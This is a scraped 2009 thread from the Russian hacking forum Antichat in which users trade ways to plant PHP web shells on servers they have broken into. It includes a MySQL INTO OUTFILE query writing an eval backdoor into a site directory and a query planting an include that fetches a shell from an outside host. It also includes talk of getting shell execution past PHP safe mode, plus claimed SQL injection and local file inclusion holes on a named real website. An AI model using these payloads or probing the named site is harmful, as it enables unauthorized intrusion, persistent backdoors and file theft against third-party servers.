ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

03.05.2009, 01:03
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
Qwazar, я про удалённый инклуд и не говорил)
а вообще лучше залить гифку с полноценным шеллом
так как он в админке пшпбб, то там наверника есть способ залить картинку
|
|
|

03.05.2009, 02:57
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
а ещё лучше echo =)
echo `ls -la`; - с косыми кавычками выполняет ту же функцию, что и пасстру ;-)
|
|
|

03.05.2009, 03:06
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Сообщение от o3,14um
а ещё лучше echo =)
echo `ls -la`; - с косыми кавычками выполняет ту же функцию, что и пасстру ;-)
Ничем не лучше, для того, чтобы это работало, должна быть включена функция shell_exec, а она не пашет при сейф моде. В отличии от eval.
P.S.
И работает она не как passthru(), а как shell_exec().
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 03.05.2009 в 03:10..
|
|
|

03.05.2009, 04:04
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Заранее извиняюсь,что не прочитал всю тему,но нельзя ли выполнить phpinfo() для просмотра safe_mode = On
Если РНР запущен в виде CGI модуля, то safe mode полюбому отсутствует.Также при юзании include,fopen(),file() и других функций safe mode даст о себе знать.Можно попробовать позапускать сценарии в различных каталогах(функциями system(),exec(),popen(),если они работают). Опять же будет попытка ругани со стороны сервера на то,что ты откроешь чужой фаил.Значит,опять сейф мод стоит.То бишь сразу будет ясно,что стоит директива safe_mode_exec_dir.Ещё можно попробовать создавать файлы с помощью php функций в других каталогах.Если будет ругаться - опять safe mode.Вообще,при safe mode,будут введены ограничения на следующие функции:
chgrp include require
chmod link rmdir
chown passthru symlink
exec popen system
fopen readfile unlink
file rename
Если со всеми ними будет неладно,то 100% стоит safe mode.Пробуй)
|
|
|

03.05.2009, 18:37
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме: 485675
Репутация:
10
|
|
select '<? eval(stripslashes($_GET[phpinfo])); ?>' from dle_files into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
Как при имеющимся доступе в PMA залить нормальный шелл, а не это.
|
|
|

03.05.2009, 20:47
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Код:
select '<? include("http://bestquest.info/shell.txt") ?>' into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
|
|
|

03.05.2009, 23:50
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме: 458686
Репутация:
-25
|
|
Вопрос:[U]
http://wow.alania.net/?page=guilds&id=-7'
Это инъекция???
|
|
|

03.05.2009, 23:53
|
|
Banned
Регистрация: 03.05.2009
Сообщений: 8
Провел на форуме: 17814
Репутация:
-59
|
|
geforce нет
но тут
http://wow.alania.net/?page=
инклуд.
|
|
|

04.05.2009, 00:03
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме: 458686
Репутация:
-25
|
|
Сообщение от [x59]ReV
geforce нет
но тут
http://wow.alania.net/?page=
инклуд.
Это значит я туда могу shell загрузить?
|
|
|

04.05.2009, 00:18
|
|
Banned
Регистрация: 03.05.2009
Сообщений: 8
Провел на форуме: 17814
Репутация:
-59
|
|
geforce
Локальный инклуд... через него ты можеш прочитать любой фаил на серваке.
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|